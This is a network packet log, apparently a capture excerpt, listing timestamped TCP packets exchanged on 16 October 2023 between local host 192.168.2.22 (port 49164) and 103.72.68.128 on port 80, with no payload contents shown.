                                                Oct 16, 2023 09:58:27.009991884 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010016918 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010032892 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010087013 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010119915 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010164976 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010210037 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010246038 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010298967 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010325909 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010375977 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010379076 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010410070 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010416985 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010453939 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010516882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010565996 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010588884 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010627985 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010634899 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010669947 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010700941 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010749102 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010818005 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.010862112 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.010991096 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011040926 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011065006 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011111021 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011128902 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011183023 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011228085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011250019 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011270046 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011279106 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011285067 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011324883 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011356115 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011373043 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011425018 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011439085 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011455059 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011499882 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011537075 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011574984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011605024 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011639118 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011663914 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011703014 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011744976 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011789083 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.011794090 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.011833906 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.355748892 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.355777025 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.355786085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.355869055 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.355904102 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.355943918 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356024981 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356049061 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356064081 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356089115 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356113911 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356132984 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356161118 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356168032 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356199026 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356232882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356271029 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356283903 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356317997 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356323004 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356379986 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356393099 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356434107 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356446981 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356472969 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356483936 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356508970 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356563091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356623888 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356642962 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356682062 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356714964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356751919 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356771946 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356810093 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356863022 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.356900930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.356973886 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357011080 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357022047 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357057095 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357125044 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357156038 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357160091 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357191086 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357223988 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357259035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357270956 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357305050 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357335091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357369900 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357393980 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357434034 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357448101 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357482910 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357554913 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357594967 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357645035 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357681990 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357727051 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357764006 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357817888 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357856035 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357873917 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357908010 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.357944965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357975960 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.357981920 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358010054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358037949 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358076096 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358105898 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358153105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358160019 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358196020 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358217001 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358254910 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358285904 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358318090 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358359098 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358396053 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358443022 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358457088 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358478069 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358500004 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358556986 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358592987 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358607054 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358645916 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358664036 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358707905 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358722925 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358756065 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358772039 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358810902 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358812094 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358848095 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358876944 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.358913898 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.358964920 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359005928 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359025955 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359061003 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359095097 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359131098 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359159946 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359198093 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359229088 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359263897 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359267950 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359277010 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359302998 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359338045 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359375000 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359409094 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359436989 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359457970 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359472990 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359491110 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359525919 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359580040 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359625101 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359635115 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359652042 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359673977 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359685898 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359744072 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359782934 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359841108 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359884977 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359884977 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359913111 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.359920979 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359971046 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.359988928 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360028982 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360049009 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360089064 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360111952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360158920 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360165119 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360197067 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360198975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360223055 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360235929 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360275984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360306978 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360342026 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360372066 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360413074 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360424042 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360460997 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360481024 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360516071 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360579014 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360620975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360651016 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360688925 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360742092 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360780001 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360780954 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360825062 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360857964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360894918 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.360943079 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.360984087 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361016989 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361047029 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361051083 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361084938 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361116886 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361156940 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361171007 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361211061 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361243010 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361258030 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361279964 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361299038 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361340046 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361373901 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361393929 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361434937 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361494064 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361534119 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361553907 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361593962 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361625910 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361661911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361664057 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361700058 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361749887 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361787081 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361804962 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361839056 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361871958 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361908913 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.361927032 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361963034 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.361968040 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362001896 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362034082 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362075090 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362108946 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362143993 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362178087 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362216949 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362267017 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362294912 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362303972 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362355947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362358093 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362397909 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362437963 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362473965 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362508059 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362544060 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362545013 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362577915 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362634897 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362670898 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362703085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362740040 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362739086 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362772942 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362807035 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362843990 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362915039 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.362961054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.362970114 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363009930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363090992 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363106012 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363128901 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363151073 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363181114 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363219976 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363241911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363298893 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363321066 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363360882 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363380909 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363419056 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363456964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363496065 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363516092 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363557100 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363588095 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363622904 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363627911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363662958 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363732100 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363770008 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363804102 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363837957 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363853931 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363893986 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363912106 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.363948107 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.363979101 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364018917 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364042044 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364068985 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364074945 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364100933 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364111900 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364151001 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364202976 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364242077 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364275932 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364310980 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364360094 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364401102 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364411116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364449978 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364505053 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364546061 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.364564896 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.364604950 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.365345001 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.367804050 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.367852926 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.367914915 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.367959023 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.367996931 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.367997885 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368031025 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.368050098 CEST8049164103.72.68.128192.168.2.22
